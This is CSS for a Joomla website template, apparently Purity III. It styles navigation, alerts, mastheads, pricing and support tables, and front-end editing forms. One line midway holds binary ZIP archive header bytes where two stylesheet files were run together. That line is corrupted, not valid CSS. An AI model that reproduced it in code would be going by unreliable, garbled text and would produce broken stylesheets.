.article-index ul > .active > a:active,
#article-index ul > .active > a:focus,
.article-index ul > .active > a:focus {
  border: 0;
  background: #10bf00;
  color: #ffffff;
}
.pagenav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.pagenav > li {
  margin: 0;
  padding: 0;
  float: left;
}
.pagenav > li.pagenav-prev,
.pagenav > li.previous {
  margin-right: 10px;
}
.pagenav li > a {
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #dddddd;
  border-radius: 0px;
}
.pagenav li > a:hover,
.pagenav li > a:active,
.pagenav li > a:focus {
  background-color: #eeeeee;
}
.items-more h3 {
  margin: 0 0 20px;
}
.items-more .nav > li {
  border-top: 1px solid #eeeeee;
}
.items-more .nav > li > a {
  padding: 6px 5px;
}
.back_button a {
  display: block;
  margin: 10px 0;
}
.filters {
  margin: 10px 0 5px;
}
.display-limit {
  margin: 10px 0 5px;
}
.filters .display-limit {
  float: right;
  text-align: right;
}
#system-message dt {
  font-weight: bold;
}
#system-message dd {
  font-weight: bold;
}
#system-message dd.message ul,
#system-message dd.error ul,
#system-message dd.notice ul {
  margin: 0;
  padding: 0;
}
#system-message dd.message ul li,
#system-message dd.error ul li,
#system-message dd.notice ul li {
  background: none;
  margin: 0;
  padding: 5px;
}
.alert-message {
  background-color: #dff0d8;
  border-color: #d6e9c6;
  color: #468847;
}
.alert-message hr {
  border-top-color: #c9e2b3;
}
.alert-message .alert-link {
  color: #356635;
}
.alert-notice {
  background-color: #d9edf7;
  border-color: #bce8f1;
  color: #3a87ad;
}
.alert-notice hr {
  border-top-color: #a6e1ec;
}
.alert-notice .alert-link {
  color: #2d6987;
}
.alert-error {
  background-color: #f2dede;
  border-color: #ebccd1;
  color: #b94a48;
}
.alert-error hr {
  border-top-color: #e4b9c0;
}
.alert-error .alert-link {
  color: #953b39;
}
.alert-error .alert-message {
  background: transparent;
  color: inherit;
}
.tip-wrap {
  background: #fff6df;
  border: 1px solid #fb3;
  border-radius: 5px;
  -webkit-box-shadow: none;
  box-shadow: none;
  max-width: 300px;
  z-index: 999;
}
.tip-title {
  border-bottom: 1px solid #fb3;
  font-weight: bold;
  padding: 5px 10px;
}
.tip-text {
  font-size: 14px;
  margin: 0;
  padding: 5px 10px;
}
.hasTip img {
  border: none;
  margin: 0 5px 0 0;
}
@media (min-width: 768px) {
  .languageswitcherload {
    float: right;
    width: 100%;
  }
  .languageswitcherload .mod-languages {
    text-align: right;
  }
}
div.calendar {
  width: 187px;
}
dl.tabs {
  border-bottom: 1px solid #d9d9d9;
  display: block;
  clear: both;
  margin-bottom: 0;
}
dl.tabs:before,
dl.tabs:after {
  content: " ";
  display: table;
}
dl.tabs:after {
  clear: both;
}
dl.tabs dt.tabs {
  border: 1px solid #d9d9d9;
  display: inline-block;
  padding: 10px 20px;
  margin-right: 5px;
  margin-bottom: -1px;
}
dl.tabs dt.tabs h3 {
  margin: 0;
  font-size: 14px;
}
dl.tabs dt.tabs h3 a {
  color: #444444;
  outline: none;
}
dl.tabs dt.tabs h3 a:hover,
dl.tabs dt.tabs h3 a:focus,
dl.tabs dt.tabs h3 a:active {
  color: #0a7300;
  text-decoration: none;
}
dl.tabs dt.tabs.open {
  border-bottom-color: #ffffff;
}
dl.tabs dt.tabs.open a {
  font-weight: bold;
}
.iframe-bordered {
  border: 1px solid #dddddd;
}
.chzn-container {
  display: inline-block;
  vertical-align: middle;
}
.chzn-container-single .chzn-single,
.chzn-container-multi .chzn-choices .search-field input,
.chzn-container-single .chzn-search input {
  height: 26px;
}
.chzn-container-single .chzn-drop,
.chzn-container .chzn-drop {
  -webkit-box-sizing: content-box !important;
  -moz-box-sizing: content-box !important;
  box-sizing: content-box !important;
}
.input-prepend .chzn-container-single .chzn-single {
  border-color: #cccccc;
  height: 26px;
  border-radius: 0 3px 3px 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.input-prepend .chzn-container-active .chzn-single-with-drop {
  border-radius: 0 3px 0 0;
}
.input-prepend .chzn-container-single .chzn-drop {
  border-color: #cccccc;
}
.btn-group .chzn-results {
  white-space: normal;
}

.page-header {
  padding-bottom: 20px;
  margin: 0 0 20px;
  border-bottom: 1px solid #eeeeee;
}
.page-title,
.page-header h1 {
  line-height: 1;
  margin: 0;
}
.page-subheader {
  border-bottom: 1px solid #eeeeee;
  margin: 0 0 20px;
  padding-bottom: 20px;
}
.page-subheader:before,
.page-subheader:after {
  content: " ";
  display: table;
}
.page-subheader:after {
  clear: both;
}
.page-subtitle,
.page-subheader h2 {
  line-height: 1;
  margin: 0;
}
.page-header + .page-subheader {
  margin-top: -20px;
}
.article-title h1 a:hover,
.article-header h1 a:hover,
.article-title h2 a:hover,
.article-header h2 a:hover,
.article-title h1 a:active,
.article-header h1 a:active,
.article-title h2 a:active,
.article-header h2 a:active,
.article-title h1 a:focus,
.article-header h1 a:focus,
.article-title h2 a:focus,
.article-header h2 a:focus {
  text-decoration: none;
}
.article-title,
.article-header h1 {
  margin: 0 0 20px 0;
}
@media screen and (max-width: 767px) {
  .article-title,
  .article-header h1 {
    font-size: 24px;
  }
}
@media screen and (max-width: 767px) {
  h2.article-title,
  .article-header h2 {
    font-size: 24px;
  }
}
.item-title {
  font-weight: bold;
}
.jumbotron:before,
.jumbotron:after {
  content: " ";
  display: table;
}
.jumbotron:after {
  clear: both;
}
.jumbotron h1,
.jumbotron h2,
.jumbotron h3 {
  margin-top: 0;
}
.jumbotron p {
  color: #666666;
}
.jumbotron p:last-child {
  margin-bottom: 0;
}
.container .jumbotron {
  border-radius: 0px;
}
.jumbotron .btn {
  margin-top: 20px;
  margin-bottom: 20px;
}
.masthead {
  padding-top: 40px;
  padding-bottom: 40px;
  text-align: center;
}
.masthead p:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .masthead {
    padding-top: 80px;
    padding-bottom: 80px;
  }
  .masthead h1 {
    font-size: 84px;
  }
  .masthead p {
    font-size: 28px;
  }
  .masthead .btn-lg {
    padding: 15px 40px;
    font-size: 24px;
  }
}
.jumbotron-primary {
  background-color: #10bf00;
}
.jumbotron-primary h1,
.jumbotron-primary h2,
.jumbotron-primary h3 {
  color: #ffffff;
}
.jumbotron-primary p {
  color: #c4ffbf;
}
.jumbotron-primary .btn-primary {
  border-color: #fff;
}
.page-masthead:before,
.page-masthead:after {
  content: " ";
  display: table;
}
.page-masthead:after {
  clear: both;
}
.page-masthead .jumbotron {
  margin-top: 0 !important;
  margin-bottom: 0 !important;
  padding-top: 60px;
  padding-bottom: 60px;
  padding-left: 0;
  padding-right: 0;
}
@media screen and (max-width: 992px) {
  .page-masthead .jumbotron {
    padding-top: 40px;
    padding-bottom: 40px;
  }
  .page-masthead .jumbotron .container {
    padding: 0;
  }
}
@media screen and (max-width: 767px) {
  .page-masthead .jumbotron {
    padding-left: 20px;
  }
}
.label {
  border-radius: 0px;
}
.label:empty {
  display: none;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.page-header .label,
.page-header .badge {
  vertical-align: middle;
}
.thumbnail {
  padding: 0;
  margin-bottom: 40px;
}
.alert h4 {
  color: inherit;
}
.media:first-child {
  margin-top: 0;
}
.media-object {
  display: block;
}
.media-heading {
  margin: 0 0 5px;
}
.media > .pull-left {
  margin-right: 10px;
}
.media > .pull-right {
  margin-left: 10px;
}
.list-group-item > .badge {
  float: right;
}
.list-group-item > .badge + .badge {
  margin-right: 5px;
}
a.list-group-item.active .list-group-item-heading,
a.list-group-item.active:hover .list-group-item-heading,
a.list-group-item.active:focus .list-group-item-heading {
  color: inherit;
}
a.list-group-item.active .list-group-item-text,
a.list-group-item.active:hover .list-group-item-text,
a.list-group-item.active:focus .list-group-item-text {
  color: #96ff8c;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title > a {
  color: inherit;
}
.modal-backdrop.fade {
  opacity: 0;
  filter: alpha(opacity=0);
}
.modal-backdrop.in {
  opacity: 0.5;
  filter: alpha(opacity=50);
}
.modal-header {
  border-bottom: 0;
  padding: 20px 40px 0;
}
.modal-title {
  font-size: 35px;
}
.modal-body {
  padding: 10px 40px 20px;
}
@media screen and (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
}

.logo {
  position: absolute;
  top: 0;
  left: 0;
  padding: 0;
  margin: 0;
}
.logo a {
  background: transparent;
  color: #fff;
  text-decoration: none;
  display: inline-block;
  line-height: 1;
  margin: 0;
}
.logo:hover a,
.logo a:hover,
.logo a:active,
.logo a:focus {
  background: #0ea600;
  color: #ffffff;
  text-decoration: none;
}
@media screen and (min-width: 991px) {
  .logo {
    position: static;
  }
  .logo a {
    background: #0ea600;
  }
  .logo:hover a,
  .logo a:hover,
  .logo a:active,
  .logo a:focus {
    color: #ffffff;
  }
}
.off-canvas-toggle + .container .navbar-header .logo {
  left: 55px;
  border-left: 1px solid #0ea600;
}
@media screen and (min-width: 991px) {
  .off-canvas-toggle + .container .navbar-header .logo {
    border-left: 0;
  }
}
.logo-image > a {
  max-width: 160px;
  max-height: 55px;
}
.logo-image > a > img {
  max-width: 100%;
}
.logo-image span,
.logo-image small {
  display: none;
}
.logo-text {
  text-transform: uppercase;
  font-size: 18px;
}
.logo-text a {
  line-height: 55px;
  padding: 0 20px;
}
.logo-text .site-slogan {
  display: none;
}
.head-search {
  height: 55px;
  position: absolute;
  right: 0;
  margin: 0;
  z-index: 1000;
}
.head-search form {
  margin: 0;
}
.head-search label {
  display: none;
}
.head-search .search {
  background: #10bf00;
  border-left: 1px solid #0ea600;
  border-right: 1px solid #0ea600;
  position: relative;
}
@media screen and (min-width: 991px) {
  .head-search .search {
    background: #0ea600;
  }
}
.head-search .search .fa-search {
  color: #c4ffbf;
  content: "\f002";
  display: block;
  font-family: "FontAwesome";
  position: absolute;
  left: 20px;
  top: 19px;
  z-index: 1;
}
.head-search .search .fa-search:hover {
  z-index: 0;
}
.head-search .form-control {
  border: 0;
  background: transparent;
  color: #c4ffbf;
  height: 54px;
  line-height: 35px;
  position: relative;
  margin: 0;
  padding: 10px 15px 10px 40px;
  width: 0;
  -webkit-transition: width 0.2s;
  -o-transition: width 0.2s;
  transition: width 0.2s;
}
@media screen and (min-width: 991px) {
  .head-search .form-control {
    height: 55px;
  }
}
.head-search .form-control:hover,
.head-search .form-control:active,
.head-search .form-control:focus {
  color: #ffffff;
  box-shadow: none;
}
.head-search .form-control:active,
.head-search .form-control:focus {
  width: 180px;
}
.head-search .form-control:-webkit-autofill {
  -webkit-box-shadow: 0 0 0 1000px #0067a2 inset;
  -webkit-text-fill-color: #ffffff;
}
.head-search .form-control::-moz-placeholder {
  color: #ffffff;
}
.navbar-toggle + .head-search {
  right: 55px;
  max-width: 57px;
}
@media screen and (max-width: 990px) {
  .navbar-toggle + .head-search {
    max-width: inherit;
  }
  .navbar-toggle + .head-search:hover,
  .navbar-toggle + .head-search:focus,
  .navbar-toggle + .head-search:active {
    max-width: none;
  }
  .navbar-toggle + .head-search:hover .form-control,
  .navbar-toggle + .head-search:focus .form-control,
  .navbar-toggle + .head-search:active .form-control {
    width: 180px;
  }
}
@media screen and (min-width: 991px) {
  .head-search,
  .navbar-toggle + .head-search {
    right: 15px;
    top: 0;
    max-width: none;
  }
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  color: #ffffff;
  background: transparent;
}
.chzn-container-multi .chzn-choices li.search-field input[type="text"] {
  height: 30px;
}
.chzn-container {
  max-width: 100%;
}
.chzn-container .chzn-single {
  max-width: 260px;
}
.ie8 .radio.t3onoff {
  border: 0;
}
.ie8 label.on,
.ie8 label.off {
  border: 1px solid #eeeeee;
}
.pagination > li > a,
.pagination > li > span {
  margin-bottom: 10px;
}
#eblog-wrapper {
  line-height: 1.625;
}
.com_weblinks .weblink-categories .page-header.item-title .btn {
  padding: 5px;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-minus {
  display: block;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-plus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-minus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-plus {
  display: block;
}
.t3-sl {
  padding-bottom: 40px;
  padding-top: 40px;
}
.t3-sl .t3-module {
  margin-bottom: 0;
}
.t3-sl .t3-module + .t3-module {
  margin-top: 20px;
}
@media screen and (min-width: 768px) {
  .t3-sl {
    padding-bottom: 60px;
    padding-top: 60px;
  }
}
.t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.t3-mainbody {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-content {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-sidebar {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-footer {
  background: #f7f7f7;
  color: #666666;
}
.t3-footer:before,
.t3-footer:after {
  content: " ";
  display: table;
}
.t3-footer:after {
  clear: both;
}
.t3-footer small {
  display: block;
  font-size: 100%;
}
.t3-footer-sl {
  padding: 20px 0;
}
.t3-footer-sl:before,
.t3-footer-sl:after {
  content: " ";
  display: table;
}
.t3-footer-sl:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .t3-footer-sl {
    padding: 40px 0;
  }
}
.t3-footer-sl .t3-module {
  background: #f7f7f7;
  color: #666666;
  margin-top: 10px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module .module-title {
  color: #444444;
  font-size: 18px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module ul {
  list-style: none;
  margin-left: 0;
  margin-bottom: 0;
  padding-left: 0;
}
.t3-footer-sl .t3-module ul > li {
  line-height: 24px;
}
.t3-footer-sl .t3-module ul > li > a {
  color: #666666;
}
.t3-footer-sl .t3-module ul > li > a:hover,
.t3-footer-sl .t3-module ul > li > a:active,
.t3-footer-sl .t3-module ul > li > a:focus {
  color: #666666;
}
#back-to-top {
  z-index: 999;
  position: fixed;
  right: 20px;
  top: auto;
}
#back-to-top.affix {
  bottom: 40px;
}
#back-to-top a {
  outline: none;
}
#back-to-top i {
  font-size: 28px;
}
.t3-copyright {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding: 40px 0 80px;
}
.t3-copyright:before,
.t3-copyright:after {
  content: " ";
  display: table;
}
.t3-copyright:after {
  clear: both;
}
.t3-copyright small {
  margin-bottom: 5px;
}
.copyright {
  margin-bottom: 20px;
}
.poweredby:before,
.poweredby:after {
  content: " ";
  display: table;
}
.poweredby:after {
  clear: both;
}
@media screen and (min-width: 991px) {
  .poweredby {
    text-align: right;
  }
}
.poweredby .t3-logo,
.poweredby .t3-logo-small {
  display: inline-block;
}
.mod-preview-info {
  z-index: 2000;
}
#ezblog-body .blog-text p,
#ezblog-body .blog-text li {
  line-height: 1.625;
}
.features-intro .t3-content {
  padding-top: 0;
  padding-bottom: 0;
}
.row-feature {
  border-top: 1px solid #eeeeee;
  padding: 40px 0;
  font-size: 16px;
  color: #666666;
  line-height: 1.5;
}
.page-masthead .row-feature {
  padding: 40px 0;
}
@media screen and (min-width: 992px) {
  .row-feature {
    padding: 60px 0;
  }
  .page-masthead .row-feature {
    padding: 100px 0;
  }
}
.row-feature h1,
.row-feature h2,
.row-feature h3 {
  line-height: 1.15;
  color: #444444;
}
.row-feature h1 {
  margin-top: 0;
  margin-bottom: 60px;
  font-weight: 300;
}
@media screen and (min-width: 768px) {
  .row-feature h1 {
    font-size: 84px;
  }
}
.row-feature h1 + p {
  margin-top: -55px;
}
.row-feature h2 {
  margin-top: 0;
  margin-bottom: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature h2 {
    font-size: 42px;
  }
}
.row-feature h3 {
  margin-top: 20px;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .row-feature h3 {
    font-size: 27.6px;
  }
}
.row-feature h3 + p {
  margin-top: -10px;
}
.row-feature .feature-ct {
  width: 100%;
  padding-top: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image + .feature-ct {
    width: 50%;
    float: right;
    padding-left: 20px;
  }
  .row-feature .pull-right.item-image + .feature-ct {
    width: 50%;
    float: left;
    padding-right: 20px;
  }
}
.row-feature.text-center {
  text-align: center;
}
.row-feature.row-feature-alt,
.row-feature:nth-child(even) {
  background: #f7f7f7;
}
.row-feature.row-feature-primary {
  background: #10bf00;
  color: #c4ffbf;
}
.row-feature.row-feature-primary h1,
.row-feature.row-feature-primary h2,
.row-feature.row-feature-primary h3 {
  color: #ffffff;
}
.row-feature.row-feature-primary .feature-ct,
.row-feature.row-feature-primary p {
  color: #c4ffbf;
}
.row-feature.row-feature-primary .btn-primary {
  border-color: #fff;
}
.row-feature.row-feature-primary + .row-feature-primary {
  border-top: 1px solid #0c8c00;
}
.row-feature .row-feature-narrow {
  padding-top: 20px;
  padding-bottom: 20px;
}
.row-feature:first-child {
  border-top: 0;
}
.row-feature .item-image {
  width: 100%;
  float: none;
  margin-bottom: 20px;
}
.row-feature .item-image img {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image,
  .row-feature .pull-right.item-image {
    max-width: 50%;
    min-width: 25%;
    margin-bottom: 0;
  }
  .row-feature .pull-left.item-image {
    float: left;
    text-align: left;
    padding-right: 20px;
  }
  .row-feature .pull-right.item-image {
    float: right;
    text-align: right;
    padding-left: 20px;
  }
}
.row-feature .page-header {
  border: 0;
  margin: 0 0 20px;
  padding: 0;
}
.row-feature .jumbotron {
  background: transparent;
  position: relative;
  margin-top: 0;
  margin-bottom: 20px;
  padding-top: 0;
  padding-bottom: 0;
  text-align: center;
}
@media screen and (min-width: 768px) {
  .row-feature .jumbotron {
    margin-bottom: 60px;
  }
}
.row-feature .gallery .thumbnail {
  border: 0;
  padding: 0;
}
.row-feature .gallery .thumbnail a {
  display: block;
  border: 1px solid #eeeeee;
  padding: 3px;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.row-feature .gallery .thumbnail a img {
  width: 100%;
  padding: 0;
}
.row-feature .gallery .thumbnail a:hover,
.row-feature .gallery .thumbnail a:focus,
.row-feature .gallery .thumbnail a:active {
  border-color: #bbbbbb;
}
.row-feature .gallery .thumbnail a:hover img,
.row-feature .gallery .thumbnail a:focus img,
.row-feature .gallery .thumbnail a:active img {
  opacity: .7;
}
.support-policy .row-support-policy {
  margin-bottom: 20px;
}
.support-policy .policy-item {
  margin-bottom: 20px;
  border: 1px solid #eeeeee;
}
.support-policy .policy-item .col-type {
  position: relative;
  height: 100px;
  border-bottom: 1px solid #eeeeee;
  background: #f7f7f7;
}
.support-policy .policy-item .col-type h3 {
  position: absolute;
  bottom: 10px;
  left: 20px;
}
.support-policy .policy-item .col-detail {
  height: 200px;
  padding: 20px;
}
.support-policy .policy-item .col-level {
  height: 80px;
  background: #444444;
  color: #fff;
  position: relative;
}
.support-policy .policy-item .col-level .face,
.support-policy .policy-item .col-level .count-up,
.support-policy .policy-item .col-level > strong {
  height: 80px;
  line-height: 80px;
}
.support-policy .policy-item .col-level .level-info {
  width: 160px;
  position: absolute;
  left: 0;
  bottom: 0;
}
.support-policy .policy-item .col-level .level-info .face {
  background-image: url(../../../../images/emoticons.png);
  background-repeat: no-repeat;
  background-color: rgba(0, 0, 0, 0.35);
  display: table-cell;
  width: 80px;
  border-right: 1px solid rgba(0, 0, 0, 0.2);
}
.support-policy .policy-item .col-level .level-info .count-up {
  width: 80px;
  border-right: 1px solid rgba(0, 0, 0, 0.2);
  background-color: rgba(0, 0, 0, 0.15);
  display: table-cell;
  vertical-align: middle;
  text-align: center;
  font-size: 18px;
  font-weight: bold;
}
.support-policy .policy-item .col-level strong {
  width: 100%;
  color: #ffffff;
  display: block;
  float: left;
  font-weight: bold;
  padding-left: 180px;
  font-size: 18px;
}
.support-policy .policy-item .col-level.level-1 strong {
  background: #3e9b52;
}
.support-policy .policy-item .col-level.level-1 .face {
  background-position: 0px 0px;
}
.support-policy .policy-item .col-level.level-2 strong {
  background: #2f773f;
}
.support-policy .policy-item .col-level.level-2 .face {
  background-position: 0px -80px;
}
.support-policy .policy-item .col-level.level-3 strong {
  background: #ffcc00;
}
.support-policy .policy-item .col-level.level-3 .face {
  background-position: 0px -160px;
}
.support-policy .policy-item .col-level.level-4 strong {
  background: #cca300;
}
.support-policy .policy-item .col-level.level-4 .face {
  background-position: 0px -240px;
}
.support-policy .policy-item .col-level.level-5 strong {
  background-color: #ff8800;
}
.support-policy .policy-item .col-level.level-5 .face {
  background-position: 0px -320px;
}
.support-policy .policy-item .col-level.level-6 strong {
  background: #cc0000;
}
.support-policy .policy-item .col-level.level-6 .face {
  background-position: 0px -400px;
}
.support-policy:hover {
  background: #ffffff;
  border-color: #eeeeee;
}
.support-policy:hover .level-info .face {
  top: -70px;
}
.support-policy:hover .level-info .count-up {
  bottom: 0;
}
.support-policy.style2 {
  margin-bottom: 60px;
}
.support-policy .row-heading {
  background: #444444;
  color: #ffffff;
  overflow: hidden;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading {
    display: table;
    width: 100%;
  }
}
.support-policy .row-heading > div {
  border-right: 1px solid #5e5e5e;
  font-size: 12px;
  font-weight: bold;
  padding: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading > div {
    font-size: 15px;
    display: table-cell;
  }
}
.support-policy .row-body {
  border-left: 1px solid #eeeeee;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body {
    display: table;
    width: 100%;
    margin-bottom: 0;
  }
}
.support-policy .row-body > div {
  border-right: 1px solid #eeeeee;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 20px;
  vertical-align: middle;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body > div {
    display: table-cell;
    float: none;
  }
}
.support-policy .row-body .col-type {
  background: #444444;
  color: #ffffff;
  font-size: 16px;
  font-weight: bold;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body .col-type {
    background: transparent;
    color: #444444;
  }
}
.support-policy .row-body .col-level {
  font-size: 32px;
  text-align: center;
}
.support-policy .row-body .col-status {
  border-bottom: 0;
}
.support-policy .row-body .col-status .face {
  background-image: url(../../../../images/emoticons.png);
  background-repeat: no-repeat;
  display: block;
  height: 80px;
  margin: 0 auto;
  width: 80px;
}
.support-policy .row-body .col-status strong {
  color: #ffffff;
  display: block;
  padding: 3px 0;
  text-align: center;
}
.support-policy .row-body.level-1 .col-status {
  background: #3e9b52;
}
.support-policy .row-body.level-1 .col-status .face {
  background-position: 0px 0px;
}
.support-policy .row-body.level-2 .col-status {
  background: #44aa5a;
}
.support-policy .row-body.level-2 .col-status .face {
  background-position: 0px -80px;
}
.support-policy .row-body.level-3 .col-status {
  background: #4bb762;
}
.support-policy .row-body.level-3 .col-status .face {
  background-position: 0px -160px;
}
.support-policy .row-body.level-4 .col-status {
  background: #59bd6f;
}
.support-policy .row-body.level-4 .col-status .face {
  background-position: 0px -240px;
}
.support-policy .row-body.level-5 .col-status {
  background: #68c37b;
}
.support-policy .row-body.level-5 .col-status .face {
  background-position: 0px -320px;
}
.support-policy .row-body.level-6 .col-status {
  background: #77c888;
}
.support-policy .row-body.level-6 .col-status .face {
  background-position: 0px -400px;
}
.support-policy .row-alt {
  background: #f7f7f7;
}
.support-policy .support-yes {
  color: #3e9b52;
}
.support-policy .support-no {
  color: #e1e1e1;
}
.pricing-table {
  padding-top: 40px;
  padding-bottom: 100px;
}
.pricing-table .col {
  margin-bottom: 40px;
}
@media (min-width: 992px) {
  .pricing-table .col {
    margin-bottom: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.no-padding {
    padding: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.shadow {
    box-shadow: 0 0 0 5px rgba(0, 0, 0, 0.2);
  }
}
.pricing-table .col .big-number {
  display: inline-block;
  font-size: 70px;
}
.pricing-table .col .big-number sup {
  font-size: 28px;
  top: -1em;
}
.pricing-table .col .btn {
  font-size: 20px;
  padding: 10px 20px;
}
.pricing-table .col .col-header {
  background: #666666;
  color: #ffffff;
  padding: 10px 20px;
}
.pricing-table .col ul {
  border: 1px solid #eeeeee;
  border-bottom: 0;
  list-style: none;
  margin: 0;
  padding: 0;
}
.pricing-table .col ul li {
  border-bottom: 1px solid #eeeeee;
  font-size: 16px;
  padding: 10px 20px;
  text-align: center;
}
.pricing-table .col ul li.row1 {
  background: #f7f7f7;
}
.pricing-table .col ul li i {
  color: #3e9b52;
  font-size: 18px;
}
.pricing-table .col ul li.no i {
  color: #cc0000;
}
.pricing-table .col ul li.no {
  color: #999999;
  text-decoration: line-through;
}
.pricing-table .col .col-footer {
  background: #eeeeee;
  border: 1px solid #d5d5d5;
  padding: 20px;
}
.pricing-table .col-feature {
  z-index: 200;
}
@media screen and (min-width: 992px) {
  .pricing-table .col-feature {
    margin-top: -20px;
  }
}
.pricing-table .col-feature .col-header {
  background: #10bf00;
  padding: 20px 20px;
}
.pricing-table.style2 .col:first-child .col-header {
  border-radius: 5px 0 0 0;
}
.pricing-table.style2 .col:first-child .col-footer {
  border-radius: 0 0 0 5px;
}
.pricing-table.style2 .col:last-child .col-header {
  border-radius: 0 5px 0 0;
}
.pricing-table.style2 .col:last-child .col-footer {
  border-radius: 0 0 5px 0;
}
.pricing-table.style2 .col-feature {
  border-radius: 5px;
}
.pricing-table.style2 .col-feature .col-header {
  border-radius: 5px 5px 0 0;
}
.pricing-table.style2 .col-feature .col-footer {
  border-radius: 0 0 5px 5px;
}
.our-team .lead {
  margin-bottom: 60px;
}
.our-team .thumbnail {
  text-align: center;
  border: 0;
  padding: 0 20px;
}
.our-team .thumbnail .caption {
  padding-bottom: 20px;
}
.our-team .thumbnail h3 {
  margin-bottom: 5px;
}
.our-team .thumbnail .btn {
  border-radius: 50%;
  height: 32px;
  line-height: 32px;
  margin: 0 2px;
  padding: 0;
  text-align: center;
  width: 32px;
}
.our-team .thumbnail .btn:hover {
  background: #10bf00;
  border-color: #10bf00;
  color: #ffffff;
}
.control-group .controls script + .row-fluid {
  margin-left: 0;
}
.control-group .controls script + .row-fluid + .row-fluid {
  margin-left: 0;
}
.video-wrapper {
  position: relative;
  padding-bottom: 51%;
  padding-top: 30px;
  height: 0;
}
.video-wrapper iframe {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}PKԜ�\y֦Jl+l+2purity_iii/local/css/themes/vert/frontend-edit.cssnu&1i�.com_config #templates-form .tip {
  background: #f5f5f5;
  padding: 12px 12px;
}
.com_config #templates-form textarea {
  height: auto;
  width: auto;
  min-height: 100px;
  min-width: 50%;
}
.com_config #templates-form .input-append .add-on,
.com_config #templates-form .input-prepend .add-on {
  width: 35px;
}
.com_config #templates-form .input-append input,
.com_config #templates-form .input-prepend input {
  display: inline-block;
}
.com_config #templates-form .input-append .btn,
.com_config #templates-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #templates-form .t3-admin-form-legend {
  display: none;
}
.com_config #templates-form .row-fluid .span6 {
  width: 100%;
}
@media (min-width: 768px) {
  .com_config #templates-form .control-group .control-label {
    width: 250px;
  }
  .com_config #templates-form .control-group .controls {
    margin-left: 280px;
  }
}
.com_config #modules-form .input-append .add-on,
.com_config #modules-form .input-prepend .add-on {
  width: 35px;
}
.com_config #modules-form .input-append input,
.com_config #modules-form .input-prepend input {
  display: inline-block;
}
.com_config #modules-form .input-append .btn,
.com_config #modules-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #modules-form .accordion-group {
  margin-bottom: 20px;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle {
  border: 1px solid #ddd;
  border-radius: 5px 5px 0 0;
  color: #428bca;
  display: block;
  padding: 10px;
  outline: none;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle.collapsed {
  border-radius: 5px;
  color: #666;
}
.com_config #modules-form .accordion-group .accordion-body {
  border: 1px solid #ddd;
  border-top: 0;
  border-radius: 0 0 5px 5px;
  padding-top: 20px;
}
.com_config #modules-form .accordion-group .accordion-body .nav-tabs {
  border-bottom: 0;
}
.com_config #modules-form .radio input[type="radio"] {
  margin-left: 0;
  position: relative;
}
.com_config #modules-form .radio label {
  padding-left: 5px;
  padding-right: 20px;
}
.controls select {
  vertical-align: middle;
  width: 220px;
}
@media (min-width: 768px) {
  .edit .inputbox,
  .edit input[type="text"],
  .edit select.inputbox,
  .edit select {
    width: 250px;
  }
}
.edit textarea {
  width: 100%;
}
.edit .input-append,
.edit .input-prepend {
  display: block;
  width: auto;
}
@media (min-width: 768px) {
  .edit .input-append input[type="text"],
  .edit .input-prepend input[type="text"],
  .edit .input-append input.inputbox,
  .edit .input-prepend input.inputbox {
    display: inline-block;
    width: 210px;
  }
}
.edit .input-append .btn,
.edit .input-prepend .btn {
  border: 1px solid #cccccc;
  background-color: #ffffff;
}
.edit .nav-tabs {
  margin-bottom: 20px;
}
.edit .tab-pane:before,
.edit .tab-pane:after {
  content: " ";
  display: table;
}
.edit .tab-pane:after {
  clear: both;
}
#editor-xtd-buttons,
.toggle-editor {
  margin-top: 20px;
  margin-bottom: 20px;
}
#editor-xtd-buttons .btn,
.toggle-editor .btn {
  background-color: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
}
#editor-xtd-buttons {
  margin-right: 30px;
}
#sbox-window {
  padding: 0;
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
}
.btn.jmodedit {
  padding: 0;
}
.btn.jmodedit:focus,
.btn.jmodedit:active {
  box-shadow: none;
}
